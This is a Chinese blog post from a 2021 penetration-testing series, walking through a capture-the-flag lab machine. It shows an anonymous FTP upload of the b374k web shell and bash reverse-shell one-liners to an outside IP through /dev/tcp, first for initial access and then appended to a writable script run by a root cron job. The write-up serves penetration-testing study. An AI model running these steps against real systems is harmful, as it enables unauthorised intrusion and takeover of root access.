iT邦幫忙

2021 iThome 鐵人賽

DAY 15
0

掃描

  • 老規矩 nmap 起手式
    • nmap -A 10.10.37.216
    • 有開
      • 21 FTP
        • nmap 說 Anonymous allow
      • 22 SSH
      • 80 網頁
  • 掃網頁路徑
    • python3 dirsearch.py -u http://10.10.37.216/ -e all
    • 可能有用的路徑
      • http://10.10.37.216/files/
        • 裡面有一段話,跟 meme

FTP

  • ftp 10.10.37.216
    • 帳號 : Anonymous
    • 密碼 : 空白
    • 發現路徑就是網頁伺服器的files
  • 嘗試上傳 b374k.php
    • 根目錄(網頁的 files)
      • 發現沒有權限
    • ftp 目錄
      • 有權限ㄌ!

Web Shell

  • 訪問 http://10.10.37.216/files/ftp/b374k.php
    • 使用預設密碼
  • 轉用 Reverse Shell
    • 本地端準備 nc -vlk 7877
    • 在 Terminal 輸入 bash -c 'bash -i >& /dev/tcp/10.14.7.198/7877 0>&1'
  • 切換為交互式 shell
    • python -c 'import pty; pty.spawn("/bin/bash")'

系統內逛大街

  • 根目錄底下有一個 recipe.txt
    • Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.
  • 問題
    • What is the secret spicy soup recipe?
      • love
  • 根目錄底下還有一個 incidents
    • 內部有 suspicious.pcapng
    • 透過 webshell 把資料載下來備用
  • 觀察 /home
    • 發現有一個 lennie 使用者

解析 pcap

  • 觀察第 45 個封包 follow TCP stream
    • 可以看到 webshell 的紀錄
    • 其中輸入了密碼 c4ntg3t3n0ughsp1c3

嘗試登入使用者

  • 回到 reverse shell 輸入 su lennie 並搭配上述密碼
    • 登入成功!!
  • 取得 User flag

提權

  • 在使用者資料夾裡找到 scripts 資料夾
    • 兩個檔案權限都是 root,但我們可以進行讀取
    • planner.sh
      • #!/bin/bash
        echo $LIST > /home/lennie/scripts/startup_list.txt
        /etc/print.sh
        
    • 看起來會把環境變數 $LIST 給寫到 startup_list.txt
    • 接著呼叫 /etc/print.sh
  • 觀察 /etc/print.sh 可以發現我們有 write 的權限
    • -rwx------ 1 lennie lennie 25 Nov 12 2020 /etc/print.sh
  • print.sh 下面加上一行 reverse shell
    • echo "bash -c 'bash -i >& /dev/tcp/10.14.7.198/8778 0>&1'" >> /etc/print.sh
    • 當然這邊的 port 要跟目前的不同,然後本地開 nc -vlk 8778 來聽
    • 然後連指令都還沒執行,就莫名地拿到 root ㄌ ?__?

研究拿到 Root 的原因

  • 理論上是因為某個 Cron job 的執行
  • 使用 Pspy
    • 用上述同樣方法載到靶機觀察
    • 發現每分鐘都會用 UID=0 執行一次 planner.sh
    • 所以應該是一個 root 的 cron job
  • 進入root後
    • 輸入 crontab -l
      • 就能看到這條 cron job 了

上一篇
[Day14] THM Root Me
下一篇
[Day16] THM Tomghost
系列文
我想學滲透測試喵喵喵喵!!!!30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言